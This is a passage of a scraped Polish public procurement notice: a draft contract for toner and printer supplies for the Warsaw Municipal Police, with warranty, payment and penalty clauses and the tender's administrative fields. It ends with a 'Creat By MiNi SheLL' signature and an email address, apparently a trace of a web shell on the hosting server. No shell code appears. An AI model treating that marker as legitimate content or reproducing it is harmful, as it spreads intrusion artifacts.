można zastąpić produktami o parametrach równoważnych. Oferowane produkty równoważne muszą posiadać wydajność nie gorszą niż materiały wskazane przez Zamawiającego. Oferowane równoważne materiały eksploatacyjne nie mogą powodować ograniczeń funkcjii możliwości urządzenia oraz zaniżać jakości wydruku w stosunku do materiałóworyginalnych. W przypadku, kiedy produkt oryginalny posiada wbudowany układ scalony, produkt równoważny powinien posiadać analogiczny element, działający w ten sam sposób. 8.	Materiały eksploatacyjne równoważne są produktami:1)	fabrycznie nowymi,2)	nieregenerowanymi, 3)	wytworzonymi seryjnie w cyklu produkcyjnym, zgodnym z normą ISO 9001 lub normami równoważnymi, 4)	opakowanymi hermetycznie, 5)	nienoszącymi śladów użytkowania, 6)	które zapewnią jakość wydruku co najmniej taką, jak materiał zalecany przez producenta urządzenia,7)	które nie będą ograniczać pełnej współpracy z oprogramowaniem urządzenia, monitorującym stan zasobników z tuszem lub tonerem,8)	które w żadnym stopniu nie będą naruszać praw patentowych ani innej własności intelektualnej,9)	posiadające aktualną gwarancję producenta, nie krótszą niż 2 lata od daty dostawy,10)	które nie będą materiałami eksploatacyjnymi napełnianymi powtórnie lub skopiowanymi, w sposób naruszający prawo polskie lub UE,11)	dopuszczonymi do eksploatacji przez producenta tego urządzenia.9.	Wszystkie oferowane materiały eksploatacyjne muszą być opatrzone znakiem firmowym producenta, etykietą zawierającą numer katalogowy, kodem kreskowym, listą modeli urządzeń, do których jest przeznaczony oraz terminem ważności. Każdy musi posiadać swój indywidualny i unikalny numer seryjny, w przypadku tonerów zaszyty w ich elektronice, oraz datę przydatności do użycia, która nie może być krótsza niż 2 lata od daty dostawy, potwierdzonej protokołem zdawczo-odbiorczym podpisanym przez Strony.10.	Pod pojęciem „fabrycznie nowe” Zamawiający rozumie materiały eksploatacyjne wykonane z nowych elementów, wytworzone jako nowy, nieregenerowany, nieuzupełniany produkt, z fabrycznymi zabezpieczeniami, bez śladów uszkodzenia, w oryginalnych opakowaniach producenta, z widocznym logo/nazwą producenta, nazwą (typ/symbol) produktu, posiadające wszelkie zabezpieczenia szczelności zbiorników z tonerem. Przy ich produkcji wykorzystane było 100% nowych części (żadna z części np. kaseta, bęben światłoczuły, obudowa, listwa podająca, listwa zbierająca, wałek magnetyczny, głowica drukująca, toner, atrament, tusz, śrubki, sprężynki oraz pozostałe części, nie były wykorzystywane w formie pierwotnej w całości lub w części w innym produkcie). Materiały eksploatacyjne nie mogą mieć śladów używania i uszkodzenia, nie mogą być regenerowane, prefabrykowane.11.	W przypadku trzeciej reklamacji danego typu materiału eksploatacyjnego, na żądanie Zamawiającego, Wykonawca wymieni na swój koszt wszystkie materiały eksploatacyjne danego typu na materiały oryginalne, zalecane przez producenta urządzenia.12.	W przypadku gdy Zamawiający stwierdzi, iż wydajność, jakość lub niezawodność dostarczonych materiałów eksploatacyjnych, jest niższa od parametrów produktu zalecanego przez producenta urządzenia, do którego materiał jest przeznaczony, oraz że dostarczone materiały eksploatacyjne nie posiadają właściwości materiałów oryginalnych, takich jak bieżąca sygnalizacja stanu zużycia tonera na: panelu drukarki, wydruku strony konfiguracyjnej drukarki oraz z poziomu oprogramowania zarządzającego drukarką, Wykonawca, na żądanie Zamawiającego, w terminie 3 dni roboczych, wymieni wadliwy produkt na nowy, spełniający powyższe wymogi. 13.	W przypadku uszkodzenia urządzenia, spowodowanego wadliwością dostarczonych materiałów eksploatacyjnych, Wykonawca zobowiązany będzie do zwrotu kosztów rzeczywistej naprawy urządzenia oraz kosztów ekspertyzy, wykonanej przez autoryzowany serwis naprawczy.§ 31.	Wykonawca udziela gwarancji na dostarczane w ramach niniejszej umowy materiały eksploatacyjne, do momentu wyczerpania środka barwiącego w przypadku materiałów eksploatacyjnych których to dotyczy, ograniczonej dodatkowo okresem 2 lat od daty dostawy.2.	W okresie gwarancji Wykonawca gwarantuje prawidłową pracę materiałów eksploatacyjnych.3.	Gwarancja obejmuje uszkodzenia mechaniczne materiału eksploatacyjnego, stwierdzone podczas odbioru dostawy przez przedstawiciela Zamawiającego.4.	Gwarancja obejmuje opakowanie i oznakowanie materiału eksploatacyjnego niezgodne z wymogami określonymi w § 2 ust. 9, stwierdzone w trakcie odbioru lub w terminie późniejszym, nawet po podpisaniu protokołu zdawczo-odbiorczego przez przedstawicieli Stron.5.	Gwarancja obejmuje zaistnienie sytuacji, o których mowa w § 2 ust. 10, 11 i 12.6.	W przypadku wad materiału eksploatacyjnego, utrudniających prawidłowe użytkowanie urządzenia, Wykonawca gwarantuje:1)	wymianę wadliwego materiału eksploatacyjnego na nowy, wolny od wad,2)	zwrot kosztów naprawy urządzenia (bez względu na to, czy jest ono jeszcze objęte gwarancją producenta), jeśli przyczyną awarii jest zastosowanie materiału eksploatacyjnego dostarczonego przez Wykonawcę oraz kosztów ekspertyzy, wykonanej przez autoryzowany serwis naprawczy.7.	Wykonawca dołoży należytej staranności, by rozpatrzenie zasadności reklamacji, a tym samym wymiana materiału eksploatacyjnego na nowy, wolny od wad, odbyło się w możliwie najkrótszym terminie, który nie przekroczy 14 dni od daty złożenia przez Zamawiającego reklamacji.8.	Zamawiający będzie składał reklamacje na piśmie faksem na nr …………………………. lub e-mailem: ………………………………………………………………………………...§ 41.	Za realizację przedmiotu umowy, określonego w § 1 ust. 1, Strony ustalają wynagrodzenie w wysokości ……………………….. zł brutto (słownie złotych: ……………………………………………….), w tym kwota ……………………….. netto (słownie złotych: ……………………………………………….), zwane dalej wynagrodzeniem umownym netto, oraz podatek VAT w kwocie ……………………….. zł (słownie złotych: ……………………………………………….).2.	Straż Miejska m.st. Warszawy/Płatnik zobowiązuje się dokonywać płatności za przedmiot umowy według cen jednostkowych netto, wskazanych w Formularzu cenowym.3.	Ceny jednostkowe netto określone w Formularzu cenowym są stałe i nie ulegają zmianie przez cały okres obowiązywania umowy.4.	Wartość umowy, określona w ust. 1, może ulec zmniejszeniu, w przypadku konieczności wycofania przez Zamawiającego urządzeń z użytkowania, do których niniejszą umową dostarczane będą materiały eksploatacyjne, bądź z powodu mniejszego zużycia materiałów eksploatacyjnych. W takiej sytuacji wynagrodzenie Wykonawcy zostanie przeliczone w oparciu o ceny jednostkowe, zawarte w Załączniku nr 1 do umowy, w stosunku do wartości faktycznej liczby dostarczonych materiałów eksploatacyjnych. Strony uzgadniają, że wartość umowy w wyniku zmniejszenia dostaw może zostać obniżona nie więcej niż o 30% wartości określonej w ust. 1.5.	Wynagrodzenie brutto, o którym mowa w ust. 1, obejmuje wszelkie koszty związane z realizacją umowy, w tym także koszty transportu (dostawy) na adres wskazany przez Zamawiającego, opłaty, cła, podatki i inne konieczne zobowiązania cywilnoprawne. Wynagrodzenie wyczerpuje wszelkie należności przysługujące Wykonawcy od Zamawiającego związane z realizacją umowy.6.	Zapłata wynagrodzenia za dostarczone materiały eksploatacyjne będzie dokonywana każdorazowo na podstawie faktury VAT za zrealizowane zamówienie, przy czym faktura VAT za ostatnią dostawę zostanie dostarczona do siedziby Straży Miejskiej m.st. Warszawy/Płatnika do dnia 10 grudnia 2020 r.7.	Podstawą wystawienia faktury VAT będzie protokół zdawczo-odbiorczy podpisany przez przedstawicieli Stron.8.	Faktury VAT będą wystawiane na: Miasto Stołeczne Warszawa, Plac Bankowy 3/5, 00-950 Warszawa, NIP: 525-22-48-481, natomiast Płatnikiem i odbiorcą faktur VAT będzie Straż Miejska m.st. Warszawy, z siedzibą przy ul. Młynarskiej 43/45, 01-170 Warszawa.9.	Wykonawca zobowiązuje się do umieszczania w fakturach VAT, o których mowa w ust. 8, numeru niniejszej umowy.10.	Z tytułu wykonania przedmiotu umowy, Straż Miejska m.st. Warszawa/Płatnik dokona przelewu bankowego na rachunek bankowy Wykonawcy, wskazany w fakturze VAT, w terminie do 21 dni kalendarzowych, od daty doręczenia prawidłowo wystawionej faktury VAT, do siedziby Straży Miejskiej m.st. Warszawy/Płatnika, ul. Młynarska 43/45, 01-170 Warszawa.11.	Straż Miejska m.st. Warszawy/Płatnik oświadcza, że będzie dokonywał płatności wynagrodzenia za przedmiot umowy z zastosowaniem mechanizmu podzielonej płatności.12.	Za dzień zapłaty wynagrodzenia, uważa się dzień obciążenia rachunku bankowego Straży Miejskiej m.st. Warszawy/Płatnika.13.	Termin zapłaty uważa się za zachowany, jeżeli obciążenie rachunku bankowego Straży Miejskiej m.st. Warszawy/Płatnika, nastąpiło nie później niż w ostatnim dniu upływu terminu zapłaty.*dodatkowo w przypadku wykonawcy prowadzącego działalność gospodarczą:14.	Wykonawca oświadcza, że wskazany w fakturze VAT rachunek bankowy jest rachunkiem rozliczeniowym służącym wyłącznie do celów rozliczeń z tytułu prowadzonej przez niego działalności gospodarczej.§ 51.	Wszelka korespondencja w sprawach wynikających z niniejszej umowy kierowana będzie przez Wykonawcę na adres: Straż Miejska m.st. Warszawy, 01-170 Warszawa, ul. Młynarska 43/45. 2.	Wszelkie zobowiązania i uprawnienia wynikające z niniejszej umowy w imieniu m.st. Warszawy realizuje Straż Miejska m.st. Warszawy.§ 61.	Osobą odpowiedzialną za koordynację realizacji umowy, w tym uprawnioną do składania zamówień i podpisywania protokołów zdawczo-odbiorczych oraz wskazaną do kontaktów ze strony Zamawiającego jest: ………………………..2.	Osobą uprawnioną do składania dokumentów reklamacyjnych jest: ………………………..3.	Wszelkie obowiązki wynikające z umowy, obciążające Zamawiającego, realizuje właściwy Zastępca Komendanta.4.	Osobą odpowiedzialną za koordynację realizacji umowy, w tym uprawnioną do podpisywania protokołów zdawczo-odbiorczych oraz wskazaną do kontaktów ze Strony Wykonawcy jest: ………………………..§ 71.	W przypadku odstąpienia przez Zamawiającego od umowy z przyczyn, za które odpowiedzialność ponosi Wykonawca lub odstąpienia Wykonawcy od umowy bez winy Zamawiającego, Wykonawca będzie zobowiązany do zapłaty kary umownej w wysokości 10% wynagrodzenia umownego netto, określonego w § 4 ust. 1.2.	W przypadku odstąpienia przez Wykonawcę od umowy z przyczyn, za które odpowiedzialność ponosi Zamawiający lub odstąpienia przez Zamawiającego od umowy bez winy Wykonawcy, Straż Miejska m.st. Warszawy/Płatnik, będzie zobowiązana do zapłaty kary umownej w wysokości 10% wynagrodzenia umownego netto, określonego w § 4 ust. 1.3.	Wykonawca jest zobowiązany do zapłaty Straży Miejskiej m.st. Warszawy/Płatnikowi kary umownej za zwłokę w terminie dostawy w wysokości 1% wartości netto tej części dostawy, za każdy rozpoczęty dzień zwłoki.4.	Za zwłokę w usunięciu braków lub wad, określonych w § 2 ust. 5, Wykonawca zapłaci Straży Miejskiej m.st. Warszawy/Płatnikowi karę umowną, w wysokości 5% wartości netto danej partii towaru, której wada lub brak dotyczy, za każdy dzień zwłoki.5.	Za zwłokę w rozpatrzeniu reklamacji Wykonawca zapłaci Straży Miejskiej m.st. Warszawy/Płatnikowi karę umowną w wysokości 200 zł za każdy dzień zwłoki, liczonej od upływu terminu, o którym mowa w § 3 ust. 7.6.	Wykonawca zapłaci Straży Miejskiej m.st. Warszawy/Płatnikowi karę umowną w wysokości 5% wynagrodzenia umownego netto, określonego w § 4 ust. 1, w przypadku uszkodzenia urządzenia spowodowanego wadliwością dostarczonych materiałów eksploatacyjnych.7.	Kara umowna, określona w ust. 1, 3, 4, 5 i 6, zostanie potrącona przez Straż Miejską m.st. Warszawy/Płatnika, z wynagrodzenia przysługującego Wykonawcy za przedmiot umowy, na podstawie noty księgowej lub, w przypadku braku takiej możliwości, zostanie zapłacona przez Wykonawcę na podstawie wystawionej przez Straż Miejską m.st. Warszawy/Płatnika noty księgowej, w terminie 7 dni od daty jej dostarczenia do Wykonawcy.8.	Maksymalna łączna kwota kar umownych określonych w niniejszej umowie nie może przekroczyć 30% wynagrodzenia umownego netto, określonego w § 4 ust. 1.9.	Zamawiający zastrzega sobie prawo dochodzenia odszkodowania przewyższającego wysokość kar umownych.§ 81.	Zamawiający może odstąpić od umowy ze skutkiem natychmiastowym, jeżeli:1)	Wykonawca przystąpił do likwidacji swojej firmy, z wyjątkiem likwidacji przeprowadzonej w celu przekształcenia lub restrukturyzacji,2)	Wykonawca nie wykonywał przedmiotu umowy z wymaganą starannością , realizował umowę niewłaściwie i niezgodnie z jej zapisami, a wezwania (co najmniej dwukrotne) Zamawiającego do należytego wykonania tych czynności okazały się nieskuteczne,3)	Wykonawca z własnej winy przerwał świadczenie dostaw i w ciągu 7 dni roboczych nie rozpoczął świadczenia, pomimo pisemnego wezwania przez Zamawiającego.2.	W razie zaistnienia istotnej zmiany okoliczności, powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, lub dalsze wykonanie umowy może zagrozić istotnemu interesowi bezpieczeństwa państwa lub bezpieczeństwu publicznemu, Zamawiający może odstąpić od umowy w terminie 30 dni od dnia powzięcia wiadomości o tych okolicznościach. 3.	W przypadku o którym mowa w ust. 1 i 2, Wykonawca może żądać jedynie wynagrodzenia należnego mu z tytułu wykonania części umowy.4.	Odstąpienie od umowy powinno nastąpić w formie pisemnej pod rygorem nieważności, z podaniem uzasadnienia, w terminie 30 dni licząc od dnia następnego po dniu, w którym Straż Miejska m.st. Warszawy powzięła informację o zaistniałych podstawach faktycznych do odstąpienia.§ 9Wykonawca zobowiązuje się do przestrzegania zakazu cesji, tj. zakazu przenoszenia przez Wykonawcę jakichkolwiek praw lub obowiązków wynikających z niniejszej umowy na osoby trzecie, dokonywania obciążeń tych praw w jakiejkolwiek formie, a także poprzez ustanowienie zastawu czy objęcia umową poręczenia, bez wcześniejszej pisemnej zgody Zamawiającego, wyrażonej w formie aneksu do umowy, sankcjonującego zmianę umowy dopuszczalną na gruncie przepisów ustawy Prawo zamówień publicznych.§ 10Umowa obowiązuje od dnia zawarcia do dnia 31 grudnia 2020 r.§ 11Wykonawca zobowiązuje się do przestrzegania przepisów ustawy z dnia 10 maja 2018 r. o ochronie danych osobowych (Dz.U. z 2019 r. poz. 1781) oraz przepisów rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), w szczególności podczas wykonywania prac stwarzających możliwość dostępu do tych danych, do ich ochrony przed niepowołanym dostępem, nieuzasadnioną modyfikacją lub zniszczeniem, nielegalnym ujawnieniem lub pozyskaniem.§ 121.	W sprawach nieuregulowanych niniejszą umową, mają zastosowanie przepisy ustawy Prawo zamówień publicznych i Kodeksu cywilnego.2.	Wszelkie zmiany treści umowy wymagają formy pisemnej pod rygorem nieważności i muszą być zgodne z przepisami ustawy Prawo zamówień publicznych.3.	Wszelkie spory powstałe w związku z realizacją niniejszej umowy Strony będą starały się rozstrzygnąć polubownie. W przypadku jeżeli rozstrzygnięcie sporu na drodze polubownej okaże się niemożliwe, zostanie on poddany pod rozstrzygnięcie sądu powszechnego, właściwego miejscowo dla siedziby Straży Miejskiej m.st. Warszawy.4.	Wszelkie zobowiązania i uprawnienia Zamawiającego wynikające z umowy realizuje Straż Miejska m.st. Warszawy.5.	Umowę niniejszą sporządzono w dwóch jednobrzmiących egzemplarzach, po jednym dla Zamawiającego i dla Wykonawcy.6.	Załączniki do umowy stanowiące integralną część umowy:1)	Załącznik nr 1 – kserokopia Formularza cenowego,2)	Załącznik nr 2 – oświadczenie Wykonawcy,3)	Załącznik nr 3 – podsumowanie ofert - raport z licytacji. ZAMAWIAJACY WYKONAWCAZałącznik Nr 2 do Umowy Nr ……………………Dane dotyczące WykonawcyNazwa	………………………………………………………Siedziba	………………………………………………………	Nr. telefonu	………………………………………………………Nr NIP	………………………………………………………Nr REGON	………………………………………………………e-mail:	………………………………………………………OŚWIADCZENIE WYKONAWCYdotyczące dostaw materiałów eksploatacyjnych do urządzeń wielofunkcyjnych, drukarek oraz kserokopiarekOświadczamy, że zaoferowane materiały eksploatacyjne równoważne/zamienne są odpowiednie dla danego rodzaju urządzenia i będą w pełni z nim współpracowały. W przypadku uszkodzenia urządzenia, spowodowanego wadliwością dostarczonych materiałów eksploatacyjnych, zobowiązujemy się do zwrotu kosztów rzeczywistej naprawy urządzenia oraz kosztów ekspertyzy, wykonanej przez autoryzowany serwis naprawczy.……………..dnia………………..(Podpis osoby uprawnionej do składania oświadczenia woli w imieniu Wykonawcy)</span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje">Zamawiający w chwili zaproszenia do licytacji elektronicznej (aukcji)</span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Nie</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst"></span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-02-25</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">11:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">Język polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17"></span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">Po zamknięciu licytacji elektronicznej, w terminie wyznaczonym przez Zamawiającego, Wykonawca, który został zwycięzcą licytacji elektronicznej ma obowiązek przekazać Zamawiającemu sporządzony formularz cenowy (w formie pisemnej). Ceny jednostkowe w formularzu cenowym mają zostać określone tak, aby łączna cena zamówienia brutto była równa lub nie wyższa niż cena oferty, która wygrała licytację elektroniczną. Wszystkie ceny muszą być wyrażone z dokładnością do dwóch miejsc po przecinku. Integralną częścią niniejszego ogłoszenia są: 1) wzór wniosku o dopuszczenie do udziału w licytacji elektronicznej - załącznik nr 1 do ogłoszenia, 2) wzór oświadczenia Wykonawcy - załącznik nr 2 do ogłoszenia, 3) wzór informacji o grupie kapitałowej - załącznik nr 3 do ogłoszenia. Powyższe załączniki są dostępne na stronie internetowej Zamawiającego pod adresem: http://www.strazmiejska.waw.pl</span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com